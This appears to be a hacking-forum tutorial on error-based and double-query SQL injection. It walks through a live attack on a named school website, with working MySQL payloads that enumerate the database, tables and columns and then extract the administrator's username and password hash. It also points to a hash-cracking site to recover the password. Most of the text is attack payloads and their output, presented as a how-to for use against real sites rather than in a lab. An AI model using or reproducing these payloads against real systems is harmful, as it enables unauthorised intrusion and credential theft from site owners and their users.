Difficulty: Intermediate Level 2 and Advanced
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)
Alright I'll make this tutorial as short as possible so that you can understand faster.
Understanding Error Based/Double Query
How does Error Base and Double Query work
Error Based:
Code:
A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information
Double Query:
Code:
Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it
I'll explain further in this tutorial
Anyways, focus on this part of this tutorialError Based IS Double Query
Error Based = Double Query (Error based 2x)
How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking; the type of injection to use in different situations
You can use Error Based/ Double Query Injections in the following errors you get
Code:
a. The Used Select Statements Have Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604
Now take note of those errors. You'll be needing it Lets start with Error Based SQL injection
Alright for this lesson, we'll use this site as an example:
http://www.aliqbalschools.org
First approach is knowing the version of the database
To do that we enter this query after the end of the URL
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
So the site will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
Results:
Now that we know the version of the database which is 5, lets move to the next step
Second step: Getting the database name
To get the database, we enter this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1Now our website address will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Database is : iqbal_iqbal
Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later
Third Step: Getting the TABLE NAMES
Table names is what we need now
Here's the query we can use:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Don't also forget the LIMIT function we used here to get table names one by one
Alright our web address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now here's the important part:
When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from
Here's the formula: LIMIT N,1 where N is a random integer
Valuable Tables can be:
Code:
Users
Admin
user
administrator
tbladmin
tblusers
settings
In this case, we have the table "settings"
So now we know our table, lets move on to the next step
Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:Code:
Duplicate entry 'Id~1' for key 'group_key
Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Column name= passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password
Fifth Step: Extracting the data from Columns
Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
3. TABLENAME: where you insert the table name of the column names you extracted from
4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"
After you're done with altering the code to your needs of extracting information, time to execute it
Here's what the code will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:Code:
Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
SUCCESS, you injected the site with error based now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash
Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
First off, the definition so that you can understand:
Code:
Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.
Differences:
Error Based Query for Database Extraction:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Double Query for Database Extraction:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now you get the idea, lets cut to the chase and go on
We'll be using the same site as above
Step1: Getting the database versionAlright same as Error Based, here's the Double query:
Code:and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1
So our Address will look like this:
Code:http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.
Results after query execution:
Code:Duplicate entry '~'5.1.56-log'~1' for key 'group_key
Database version is 5You can test on the site now if you want so that you won't get confused
Step2: Getting the DatabaseNow we've got the version, lets execute a double query on extracting the databaseQuery for Database extraction:
Code:and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the LIMIT Function again and make sure you don't make mistakes in thatIt shows thatLimit N,1 where N is a random integer. Example: Limit 0,1
Code:http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Once more, don't forget about the LIMIT Function
So here's the results:
Code:iqbal_iqbal
Now that's their database.Note it down on a notepad or a paperStep3: Getting the Table NamesAs I've explained above, we'll be also using the LIMIT Function in this query.Just a quick look, the query will look like this:
Code:and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Wheretable_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1
Alright you need to focus on the code and see the changes.There are two variables here:1. Hex_code_databasename2. LIMIT Function
Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbalTo convert your database name into hex: http://www.swingnote.com/tools/texttohex.phpNow that you've the database into hex, lets see what our address will look like:
Code:http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
LIMIT 19,1 brings us the valuable table which is "settings"Review the code and study it
Step4: Getting Column names from specific Tables and DatabaseNow that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extractionHere's what the query will look like:Code:and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Wheretable_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Now here we have 3 variables:1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)2. Hex code of tablename: Hex the table name which is "settings"3. LIMIT FunctionAlright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.
Here's what the address is gonna look like:Code:http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Notice the hexed variables and the LIMIT FunctionKeep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"Review what we have just done for less confusionStep5: Getting the Data from the Columns with the help of Table name and Database nameAlright now that we know what we need to extract, lets get our goodsAs far as what we're injected in the site, this is our information:database name: iqbal_iqbaltable name: settingscolumn names: userName, passWord
Here's what the query will look like first (for extracting data):
Code:and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Variables:table_name.column_name: Input the table name and column name you want to extract information from
database_name.table_name: Input the database name and table name you want to extract information from
LIMIT Function: Increment until you find the data you need
So here's what our address is gonna look like when we extract details from userName
Code:http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Output:Code:admim
Query for extracting details from passWord
Code:http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Code: 86f574c1d63d53fa804c13c3213953d9
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.